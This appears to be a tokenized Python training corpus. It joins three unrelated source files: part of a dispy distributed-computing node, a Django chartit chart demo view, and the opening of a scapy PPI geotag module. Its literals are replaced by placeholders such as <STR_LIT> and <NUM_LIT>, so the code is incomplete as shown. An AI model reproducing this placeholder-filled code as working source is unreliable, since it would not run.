disk_usage ( self . dest_path_prefix ) . free , <EOL> <NUM_LIT> - psutil . swap_memory ( ) . percent ) <EOL> else : <EOL> info [ '<STR_LIT>' ] = None <EOL> yield sock . sendto ( b'<STR_LIT>' + serialize ( info ) , <EOL> ( self . scheduler [ '<STR_LIT>' ] , self . scheduler [ '<STR_LIT:port>' ] ) ) <EOL> sock . close ( ) <EOL> resend = [ compute for compute in self . computations . values ( ) <EOL> if compute . pending_results and not compute . zombie ] <EOL> for compute in resend : <EOL> Coro ( self . resend_job_results , compute ) <EOL> if self . zombie_interval and ( now - last_zombie_time ) >= self . zombie_interval : <EOL> last_zombie_time = now <EOL> for compute in self . computations . values ( ) : <EOL> if ( now - compute . last_pulse ) > self . zombie_interval : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute . name ) <EOL> compute . zombie = True <EOL> zombies = [ compute for compute in self . computations . values ( ) <EOL> if compute . zombie and compute . pending_jobs == <NUM_LIT:0> ] <EOL> for compute in zombies : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute . name ) <EOL> self . cleanup_computation ( compute ) <EOL> for compute in zombies : <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , compute . scheduler_ip_addr ) <EOL> info = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . sign } <EOL> try : <EOL> yield sock . connect ( ( compute . scheduler_ip_addr , compute . scheduler_port ) ) <EOL> yield sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( info ) ) <EOL> except : <EOL> pass <EOL> finally : <EOL> sock . close ( ) <EOL> if ( not self . scheduler [ '<STR_LIT>' ] and not self . job_infos and self . avail_cpus > <NUM_LIT:0> ) : <EOL> self . pulse_interval = None <EOL> yield self . 
broadcast_ping_msg ( coro = coro ) <EOL> def service_available ( self ) : <EOL> if self . serve == <NUM_LIT:0> : <EOL> return False <EOL> if not self . service_start or not self . service_end : <EOL> return True <EOL> now = time . localtime ( ) <EOL> if self . service_stop : <EOL> end = self . service_stop <EOL> else : <EOL> end = self . service_end <EOL> if self . service_start < end : <EOL> if self . service_start <= ( now . tm_hour , now . tm_min ) < end : <EOL> return True <EOL> else : <EOL> if ( now . tm_hour , now . tm_min ) >= self . service_start or ( now . tm_hour , now . tm_min ) < end : <EOL> return True <EOL> return False <EOL> def service_schedule ( self , coro = None ) : <EOL> coro . set_daemon ( ) <EOL> while True : <EOL> yield coro . sleep ( <NUM_LIT> ) <EOL> if self . service_available ( ) : <EOL> yield self . broadcast_ping_msg ( coro = coro ) <EOL> else : <EOL> if self . scheduler [ '<STR_LIT>' ] : <EOL> now = time . localtime ( ) <EOL> if self . service_end and ( now . tm_hour , now . tm_min ) > self . service_end : <EOL> _dispy_logger . debug ( '<STR_LIT>' ) <EOL> self . shutdown ( quit = False ) <EOL> else : <EOL> _dispy_logger . debug ( '<STR_LIT>' ) <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> try : <EOL> yield sock . connect ( ( self . scheduler [ '<STR_LIT>' ] , self . scheduler [ '<STR_LIT:port>' ] ) ) <EOL> info = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT>' : self . sign , '<STR_LIT>' : <NUM_LIT:0> } <EOL> yield sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( info ) ) <EOL> except : <EOL> pass <EOL> finally : <EOL> sock . close ( ) <EOL> def __job_program ( self , _job , job_info ) : <EOL> compute = self . computations [ _job . compute_id ] <EOL> if compute . name . endswith ( '<STR_LIT>' ) : <EOL> program = [ sys . executable , compute . 
name ] <EOL> else : <EOL> program = [ compute . name ] <EOL> args = unserialize ( _job . args ) <EOL> program . extend ( args ) <EOL> reply = job_info . job_reply <EOL> try : <EOL> os . chdir ( compute . dest_path ) <EOL> env = { } <EOL> env . update ( os . environ ) <EOL> env [ '<STR_LIT>' ] = compute . dest_path + os . pathsep + env [ '<STR_LIT>' ] <EOL> job_info . proc = subprocess . Popen ( program , stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE , env = env ) <EOL> assert isinstance ( job_info . proc , subprocess . Popen ) <EOL> reply . stdout , reply . stderr = job_info . proc . communicate ( ) <EOL> reply . result = job_info . proc . returncode <EOL> reply . status = DispyJob . Finished <EOL> except : <EOL> reply . exception = traceback . format_exc ( ) <EOL> reply . status = DispyJob . Terminated <EOL> reply . end_time = time . time ( ) <EOL> job_info . proc = None <EOL> self . reply_Q . put ( reply ) <EOL> def __reply_Q ( self ) : <EOL> while True : <EOL> job_reply = self . reply_Q . get ( ) <EOL> if job_reply is None : <EOL> break <EOL> self . thread_lock . acquire ( ) <EOL> job_info = self . job_infos . get ( job_reply . uid , None ) <EOL> if job_info is not None : <EOL> job_info . job_reply = job_reply <EOL> self . thread_lock . release ( ) <EOL> if job_info is not None : <EOL> self . num_jobs += <NUM_LIT:1> <EOL> self . cpu_time += ( job_reply . end_time - job_reply . start_time ) <EOL> if job_info . proc is not None : <EOL> if isinstance ( job_info . proc , multiprocessing . Process ) : <EOL> job_info . proc . join ( <NUM_LIT:2> ) <EOL> else : <EOL> job_info . proc . wait ( ) <EOL> Coro ( self . _send_job_reply , job_info , resending = False ) <EOL> compute = self . computations . get ( job_info . compute_id , None ) <EOL> if not compute : <EOL> continue <EOL> for xf in job_info . xfer_files : <EOL> path = os . path . join ( compute . dest_path , os . path . basename ( xf . name ) ) <EOL> try : <EOL> compute . 
file_uses [ path ] -= <NUM_LIT:1> <EOL> if compute . file_uses [ path ] == <NUM_LIT:0> : <EOL> compute . file_uses . pop ( path ) <EOL> os . remove ( path ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , path ) <EOL> continue <EOL> def _send_job_reply ( self , job_info , resending = False , coro = None ) : <EOL> """<STR_LIT>""" <EOL> job_reply = job_info . job_reply <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> job_reply . uid , job_reply . status , str ( job_info . reply_addr ) ) <EOL> compute = self . computations . get ( job_info . compute_id , None ) <EOL> if not resending : <EOL> self . thread_lock . acquire ( ) <EOL> assert self . job_infos . pop ( job_reply . uid , None ) is not None <EOL> self . thread_lock . release ( ) <EOL> self . avail_cpus += <NUM_LIT:1> <EOL> assert self . avail_cpus <= self . num_cpus <EOL> if compute : <EOL> compute . pending_jobs -= <NUM_LIT:1> <EOL> sock = socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) <EOL> sock = AsyncSocket ( sock , keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> try : <EOL> yield sock . connect ( job_info . reply_addr ) <EOL> yield sock . send_msg ( b'<STR_LIT>' + serialize ( job_reply ) ) <EOL> ack = yield sock . recv_msg ( ) <EOL> assert ack == b'<STR_LIT>' <EOL> except : <EOL> status = - <NUM_LIT:1> <EOL> if not resending : <EOL> f = os . path . join ( job_info . compute_dest_path , '<STR_LIT>' % job_reply . uid ) <EOL> _dispy_logger . error ( '<STR_LIT>' , <EOL> job_reply . uid , str ( job_info . reply_addr ) , f ) <EOL> try : <EOL> fd = open ( f , '<STR_LIT:wb>' ) <EOL> pickle . dump ( job_reply , fd ) <EOL> fd . close ( ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , job_reply . uid ) <EOL> else : <EOL> if compute is not None : <EOL> compute . pending_results += <NUM_LIT:1> <EOL> else : <EOL> status = <NUM_LIT:0> <EOL> if compute : <EOL> compute . last_pulse = time . 
time ( ) <EOL> if resending : <EOL> compute . pending_results -= <NUM_LIT:1> <EOL> elif compute . pending_results : <EOL> Coro ( self . resend_job_results , compute ) <EOL> if resending : <EOL> f = os . path . join ( job_info . compute_dest_path , <EOL> '<STR_LIT>' % job_reply . uid ) <EOL> if os . path . isfile ( f ) : <EOL> try : <EOL> os . remove ( f ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , f ) <EOL> if compute is None : <EOL> fd = open ( os . path . join ( self . dest_path_prefix , <EOL> '<STR_LIT>' % ( job_info . compute_id , job_info . compute_auth ) ) , <EOL> '<STR_LIT:rb>' ) <EOL> compute = pickle . load ( fd ) <EOL> fd . close ( ) <EOL> if compute : <EOL> compute . pending_results -= <NUM_LIT:1> <EOL> finally : <EOL> sock . close ( ) <EOL> if compute and compute . pending_jobs == <NUM_LIT:0> and compute . zombie : <EOL> self . cleanup_computation ( compute ) <EOL> raise StopIteration ( status ) <EOL> def cleanup_computation ( self , compute ) : <EOL> if not compute . zombie or compute . pending_jobs > <NUM_LIT:0> : <EOL> return <EOL> if compute . pending_jobs != <NUM_LIT:0> : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> compute . name , compute . id , compute . pending_jobs ) <EOL> if self . computations . pop ( compute . id , None ) is None : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute . id ) <EOL> return <EOL> self . num_computations += <NUM_LIT:1> <EOL> file_uses , compute . file_uses = compute . file_uses , { } <EOL> globalvars , compute . globals = compute . globals , { } <EOL> pkl_path = os . path . join ( self . dest_path_prefix , '<STR_LIT>' % ( compute . id , compute . auth ) ) <EOL> if compute . pending_results == <NUM_LIT:0> : <EOL> try : <EOL> os . remove ( pkl_path ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , pkl_path ) <EOL> else : <EOL> fd = open ( pkl_path , '<STR_LIT:wb>' ) <EOL> pickle . dump ( compute , fd ) <EOL> fd . close ( ) <EOL> self . scheduler [ '<STR_LIT>' ] . 
discard ( compute . auth ) <EOL> if ( ( not self . computations ) and ( not self . scheduler [ '<STR_LIT>' ] ) and <EOL> compute . scheduler_ip_addr == self . scheduler [ '<STR_LIT>' ] and <EOL> compute . scheduler_port == self . scheduler [ '<STR_LIT:port>' ] ) : <EOL> self . scheduler [ '<STR_LIT>' ] = None <EOL> self . pulse_interval = None <EOL> self . timer_coro . resume ( None ) <EOL> if self . serve > <NUM_LIT:0> : <EOL> self . serve -= <NUM_LIT:1> <EOL> Coro ( self . broadcast_ping_msg ) <EOL> if compute . cleanup is False : <EOL> if self . serve == <NUM_LIT:0> : <EOL> self . shutdown ( quit = True ) <EOL> return <EOL> os . chdir ( self . dest_path_prefix ) <EOL> if isinstance ( compute . cleanup , _Function ) : <EOL> try : <EOL> localvars = { '<STR_LIT>' : compute . cleanup . args , <EOL> '<STR_LIT>' : compute . cleanup . kwargs } <EOL> if os . name == '<STR_LIT>' : <EOL> globalvars = globals ( ) <EOL> exec ( marshal . loads ( compute . code ) , globalvars , localvars ) <EOL> exec ( '<STR_LIT>' % <EOL> compute . cleanup . name , globalvars , localvars ) <EOL> except : <EOL> _dispy_logger . debug ( '<STR_LIT>' , compute . cleanup . name ) <EOL> _dispy_logger . debug ( traceback . format_exc ( ) ) <EOL> if os . name == '<STR_LIT>' : <EOL> for var in list ( globals ( ) . keys ( ) ) : <EOL> if var not in self . __init_globals : <EOL> _dispy_logger . debug ( '<STR_LIT>' , <EOL> var , compute . name , compute . scheduler_ip_addr ) <EOL> globals ( ) . pop ( var , None ) <EOL> for var , value in self . __init_globals . items ( ) : <EOL> if var in ( '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ) : <EOL> continue <EOL> if value != globals ( ) . get ( var , None ) : <EOL> _dispy_logger . warning ( '<STR_LIT>' , <EOL> var , compute . name , compute . scheduler_ip_addr ) <EOL> globals ( ) [ var ] = value <EOL> for module in list ( sys . modules . keys ( ) ) : <EOL> if module not in compute . ante_modules : <EOL> sys . modules . 
pop ( module , None ) <EOL> sys . modules . update ( self . __init_modules ) <EOL> for path in os . listdir ( compute . dest_path ) : <EOL> path = os . path . join ( compute . dest_path , path ) <EOL> if file_uses . get ( path , <NUM_LIT:1> ) == <NUM_LIT:1> : <EOL> try : <EOL> if os . path . isfile ( path ) or os . path . islink ( path ) : <EOL> os . remove ( path ) <EOL> elif os . path . isdir ( path ) : <EOL> shutil . rmtree ( path , ignore_errors = True ) <EOL> else : <EOL> os . remove ( path ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , path ) <EOL> if os . path . isdir ( compute . dest_path ) and compute . dest_path . startswith ( self . dest_path_prefix ) and len ( os . listdir ( compute . dest_path ) ) == <NUM_LIT:0> : <EOL> try : <EOL> os . rmdir ( compute . dest_path ) <EOL> except : <EOL> _dispy_logger . warning ( '<STR_LIT>' , compute . dest_path ) <EOL> else : <EOL> _dispy_logger . debug ( '<STR_LIT>' , compute . dest_path ) <EOL> if self . serve == <NUM_LIT:0> : <EOL> self . shutdown ( quit = True ) <EOL> def shutdown ( self , quit = True ) : <EOL> def _shutdown ( self , quit , coro = None ) : <EOL> self . thread_lock . acquire ( ) <EOL> job_infos , self . job_infos = self . job_infos , { } <EOL> if quit and self . reply_Q : <EOL> self . reply_Q . put ( None ) <EOL> self . scheduler [ '<STR_LIT>' ] = None <EOL> self . scheduler [ '<STR_LIT>' ] = set ( ) <EOL> self . avail_cpus += len ( job_infos ) <EOL> if self . avail_cpus != self . num_cpus : <EOL> _dispy_logger . warning ( '<STR_LIT>' , self . avail_cpus , self . num_cpus ) <EOL> self . thread_lock . release ( ) <EOL> for uid , job_info in job_infos . items ( ) : <EOL> job_info . proc . terminate ( ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , uid ) <EOL> if isinstance ( job_info . proc , multiprocessing . Process ) : <EOL> job_info . proc . join ( <NUM_LIT:2> ) <EOL> else : <EOL> job_info . proc . wait ( ) <EOL> for cid , compute in list ( self . computations . 
items ( ) ) : <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> _dispy_logger . debug ( '<STR_LIT>' , compute . scheduler_ip_addr ) <EOL> info = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT:port>' : self . port , '<STR_LIT>' : self . sign } <EOL> try : <EOL> yield sock . connect ( ( compute . scheduler_ip_addr , compute . scheduler_port ) ) <EOL> yield sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( info ) ) <EOL> except : <EOL> pass <EOL> sock . close ( ) <EOL> compute . pending_jobs = <NUM_LIT:0> <EOL> compute . zombie = True <EOL> self . cleanup_computation ( compute ) <EOL> if quit : <EOL> self . tcp_coro . terminate ( ) <EOL> self . sign = '<STR_LIT>' <EOL> if self . sign : <EOL> Coro ( _shutdown , self , quit ) <EOL> def read_stdin ( self , coro = None ) : <EOL> coro . set_daemon ( ) <EOL> thread_pool = asyncoro . AsyncThreadPool ( <NUM_LIT:1> ) <EOL> while True : <EOL> sys . stdout . write ( '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> sys . stdout . flush ( ) <EOL> try : <EOL> cmd = yield thread_pool . async_task ( input ) <EOL> except : <EOL> continue <EOL> cmd = cmd . strip ( ) . lower ( ) <EOL> if cmd in ( '<STR_LIT>' , '<STR_LIT>' ) : <EOL> break <EOL> elif cmd in ( '<STR_LIT>' , '<STR_LIT:start>' , '<STR_LIT>' ) : <EOL> if cmd == '<STR_LIT>' : <EOL> cpus = <NUM_LIT:0> <EOL> elif cmd == '<STR_LIT:start>' : <EOL> cpus = self . num_cpus <EOL> elif cmd == '<STR_LIT>' : <EOL> cpus = multiprocessing . cpu_count ( ) <EOL> sys . stdout . write ( '<STR_LIT>' % <EOL> ( cpus - <NUM_LIT:1> , cpus ) ) <EOL> sys . stdout . flush ( ) <EOL> try : <EOL> cpus = yield thread_pool . async_task ( input ) <EOL> cpus = int ( cpus ) <EOL> if cpus >= <NUM_LIT:0> : <EOL> assert cpus <= multiprocessing . cpu_count ( ) <EOL> else : <EOL> cpus += multiprocessing . 
cpu_count ( ) <EOL> assert cpus >= <NUM_LIT:0> <EOL> except : <EOL> print ( '<STR_LIT>' ) <EOL> continue <EOL> self . num_cpus = cpus <EOL> self . avail_cpus = cpus - len ( self . job_infos ) <EOL> if self . scheduler [ '<STR_LIT>' ] : <EOL> sock = AsyncSocket ( socket . socket ( socket . AF_INET , socket . SOCK_STREAM ) , <EOL> keyfile = self . keyfile , certfile = self . certfile ) <EOL> sock . settimeout ( MsgTimeout ) <EOL> try : <EOL> yield sock . connect ( ( self . scheduler [ '<STR_LIT>' ] , self . scheduler [ '<STR_LIT:port>' ] ) ) <EOL> info = { '<STR_LIT>' : self . ext_ip_addr , '<STR_LIT>' : self . sign , '<STR_LIT>' : cpus } <EOL> yield sock . send_msg ( '<STR_LIT>' . encode ( ) + serialize ( info ) ) <EOL> except : <EOL> pass <EOL> finally : <EOL> sock . close ( ) <EOL> else : <EOL> if self . num_cpus > <NUM_LIT:0> : <EOL> Coro ( self . broadcast_ping_msg ) <EOL> else : <EOL> print ( '<STR_LIT>' % <EOL> ( self . avail_cpus + len ( self . job_infos ) , <EOL> '<STR_LIT>' % self . serivce_start if self . service_start else '<STR_LIT>' , <EOL> '<STR_LIT>' % self . service_end if self . service_end else '<STR_LIT>' , <EOL> '<STR_LIT>' % self . serve if self . serve > <NUM_LIT:0> else '<STR_LIT>' ) ) <EOL> print ( '<STR_LIT>' % <EOL> ( self . num_computations , self . num_jobs , self . cpu_time ) ) <EOL> print ( '<STR_LIT>' ) <EOL> for i , compute in enumerate ( self . computations . values ( ) , start = <NUM_LIT:1> ) : <EOL> print ( '<STR_LIT>' % <EOL> ( i , compute . name , compute . scheduler_ip_addr , compute . pending_jobs ) ) <EOL> print ( '<STR_LIT>' ) <EOL> self . shutdown ( quit = True ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> import argparse <EOL> import re <EOL> _dispy_logger = asyncoro . Logger ( '<STR_LIT>' ) <EOL> _dispy_logger . info ( '<STR_LIT>' , _dispy_version ) <EOL> parser = argparse . ArgumentParser ( ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . 
add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = False , action = '<STR_LIT:store_true>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT:-c>' , '<STR_LIT>' , dest = '<STR_LIT>' , type = int , default = <NUM_LIT:0> , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , type = int , default = <NUM_LIT> , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT:name>' , type = str , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , type = int , default = <NUM_LIT> , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = str ( MaxFileSize ) , type = str , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = <NUM_LIT> , type = float , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> parser . 
add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = - <NUM_LIT:1> , type = int , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = MsgTimeout , type = float , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , '<STR_LIT>' , dest = '<STR_LIT>' , default = '<STR_LIT>' , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , dest = '<STR_LIT>' , default = None , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' ) <EOL> parser . add_argument ( '<STR_LIT>' , action = '<STR_LIT:store_true>' , dest = '<STR_LIT>' , default = False , <EOL> help = '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _dispy_config = vars ( parser . parse_args ( sys . argv [ <NUM_LIT:1> : ] ) ) <EOL> del parser <EOL> if _dispy_config [ '<STR_LIT>' ] and os . path . isfile ( _dispy_config [ '<STR_LIT>' ] ) : <EOL> import ConfigParser <EOL> cfgp = ConfigParser . ConfigParser ( ) <EOL> cfgp . read ( _dispy_config [ '<STR_LIT>' ] ) <EOL> _dispy_config , cfgp = dict ( cfgp . items ( '<STR_LIT>' ) ) , _dispy_config <EOL> _dispy_config . update ( cfgp ) <EOL> del cfgp <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> import ConfigParser <EOL> cfgp = ConfigParser . ConfigParser ( _dispy_config ) <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> cfgfd = open ( _dispy_config [ '<STR_LIT>' ] , '<STR_LIT:w>' ) <EOL> _dispy_config . pop ( '<STR_LIT>' ) <EOL> else : <EOL> cfgfd = sys . stdout <EOL> _dispy_config . pop ( '<STR_LIT>' ) <EOL> cfgp . write ( cfgfd ) <EOL> exit ( <NUM_LIT:0> ) <EOL> _dispy_config . pop ( '<STR_LIT>' , None ) <EOL> _dispy_config . pop ( '<STR_LIT>' , None ) <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> _dispy_logger . setLevel ( logging . DEBUG ) <EOL> asyncoro . logger . 
setLevel ( logging . DEBUG ) <EOL> else : <EOL> _dispy_logger . setLevel ( logging . INFO ) <EOL> del _dispy_config [ '<STR_LIT>' ] <EOL> cpus = multiprocessing . cpu_count ( ) <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> if _dispy_config [ '<STR_LIT>' ] > <NUM_LIT:0> : <EOL> if _dispy_config [ '<STR_LIT>' ] > cpus : <EOL> raise Exception ( '<STR_LIT>' % cpus ) <EOL> else : <EOL> if _dispy_config [ '<STR_LIT>' ] <= - cpus : <EOL> raise Exception ( '<STR_LIT>' % cpus ) <EOL> cpus += _dispy_config [ '<STR_LIT>' ] <EOL> _dispy_config [ '<STR_LIT>' ] = cpus <EOL> else : <EOL> _dispy_config [ '<STR_LIT>' ] = cpus <EOL> del cpus <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> _dispy_config [ '<STR_LIT>' ] = float ( _dispy_config [ '<STR_LIT>' ] ) <EOL> if _dispy_config [ '<STR_LIT>' ] < <NUM_LIT:1> : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> MsgTimeout = _dispy_config [ '<STR_LIT>' ] <EOL> del _dispy_config [ '<STR_LIT>' ] <EOL> m = re . match ( r'<STR_LIT>' , _dispy_config [ '<STR_LIT>' ] ) <EOL> if m : <EOL> MaxFileSize = int ( m . group ( <NUM_LIT:1> ) ) <EOL> if m . group ( <NUM_LIT:2> ) : <EOL> m = m . group ( <NUM_LIT:2> ) . lower ( ) <EOL> if m == '<STR_LIT:k>' : <EOL> MaxFileSize *= <NUM_LIT> <EOL> elif m == '<STR_LIT:m>' : <EOL> MaxFileSize *= <NUM_LIT> ** <NUM_LIT:2> <EOL> elif m == '<STR_LIT:g>' : <EOL> MaxFileSize *= <NUM_LIT> ** <NUM_LIT:3> <EOL> elif m == '<STR_LIT:t>' : <EOL> MaxFileSize *= <NUM_LIT> ** <NUM_LIT:4> <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> else : <EOL> raise Exception ( '<STR_LIT>' ) <EOL> del m <EOL> del _dispy_config [ '<STR_LIT>' ] <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> _dispy_config [ '<STR_LIT>' ] = time . strptime ( _dispy_config [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> _dispy_config [ '<STR_LIT>' ] = time . strptime ( _dispy_config [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> if _dispy_config [ '<STR_LIT>' ] : <EOL> _dispy_config [ '<STR_LIT>' ] = time . 
strptime ( _dispy_config [ '<STR_LIT>' ] , '<STR_LIT>' ) <EOL> try : <EOL> if os . getpgrp ( ) != os . tcgetpgrp ( sys . stdin . fileno ( ) ) : <EOL> _dispy_config [ '<STR_LIT>' ] = True <EOL> except : <EOL> pass <EOL> if os . name == '<STR_LIT>' : <EOL> _dispy_config [ '<STR_LIT>' ] = True <EOL> if psutil : <EOL> psutil . cpu_percent ( <NUM_LIT:0.1> ) <EOL> else : <EOL> print ( '<STR_LIT>' ) <EOL> print ( '<STR_LIT>' <EOL> '<STR_LIT>' ) <EOL> _dispy_node = None <EOL> _dispy_node = _DispyNode ( ** _dispy_config ) <EOL> del _dispy_config <EOL> _dispy_node . asyncoro . finish ( ) </s>
<s> from django . shortcuts import render_to_response <EOL> from demoproject . chartdemo . models import MonthlyWeatherByCity <EOL> from chartit import DataPool , Chart <EOL> def homepage ( request ) : <EOL> ds = DataPool ( <EOL> series = <EOL> [ { '<STR_LIT>' : { <EOL> '<STR_LIT:source>' : MonthlyWeatherByCity . objects . all ( ) } , <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] } <EOL> ] ) <EOL> def monthname ( month_num ) : <EOL> names = { <NUM_LIT:1> : '<STR_LIT>' , <NUM_LIT:2> : '<STR_LIT>' , <NUM_LIT:3> : '<STR_LIT>' , <NUM_LIT:4> : '<STR_LIT>' , <NUM_LIT:5> : '<STR_LIT>' , <NUM_LIT:6> : '<STR_LIT>' , <EOL> <NUM_LIT:7> : '<STR_LIT>' , <NUM_LIT:8> : '<STR_LIT>' , <NUM_LIT:9> : '<STR_LIT>' , <NUM_LIT:10> : '<STR_LIT>' , <NUM_LIT:11> : '<STR_LIT>' , <NUM_LIT:12> : '<STR_LIT>' } <EOL> return names [ month_num ] <EOL> cht = Chart ( <EOL> datasource = ds , <EOL> series_options = <EOL> [ { '<STR_LIT>' : { <EOL> '<STR_LIT:type>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : False } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' ] <EOL> } } ] , <EOL> chart_options = <EOL> { '<STR_LIT:title>' : { <EOL> '<STR_LIT:text>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:title>' : { <EOL> '<STR_LIT:text>' : '<STR_LIT>' } } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:title>' : { <EOL> '<STR_LIT:text>' : '<STR_LIT>' } } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : False } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : False } } , <EOL> x_sortf_mapf_mts = ( None , monthname , False ) ) <EOL> return render_to_response ( '<STR_LIT>' , { '<STR_LIT>' : cht } ) </s>
<s> """<STR_LIT>""" <EOL> import struct <EOL> from scapy . packet import * <EOL> from scapy . fields import * <EOL> from scapy . contrib . ppi import PPIGenericFldHdr , addPPIType <EOL> CURR_GEOTAG_VER = <NUM_LIT:2> <EOL> PPI_GPS = <NUM_LIT> <EOL> PPI_VECTOR = <NUM_LIT> <EOL> PPI_SENSOR = <NUM_LIT> <EOL> PPI_ANTENNA = <NUM_LIT> <EOL> class Fixed3_6Field ( LEIntField ) : <EOL> def i2h ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x < <NUM_LIT:0> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:0> <EOL> elif ( x > <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT> <EOL> x = x * <NUM_LIT> <EOL> return x <EOL> def h2i ( self , pkt , x ) : <EOL> if x is not None : <EOL> if ( x <= - <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT:0> <EOL> elif ( x >= <NUM_LIT> ) : <EOL> warning ( "<STR_LIT>" % x ) <EOL> x = <NUM_LIT> <EOL> x = int ( round ( x * <NUM_LIT> ) ) <EOL> return x <EOL> def i2m ( self , pkt , x ) : <EOL> """<STR_LIT>""" <EOL> if x is None : <EOL> x = self . h2i ( pkt , <NUM_LIT:0> ) 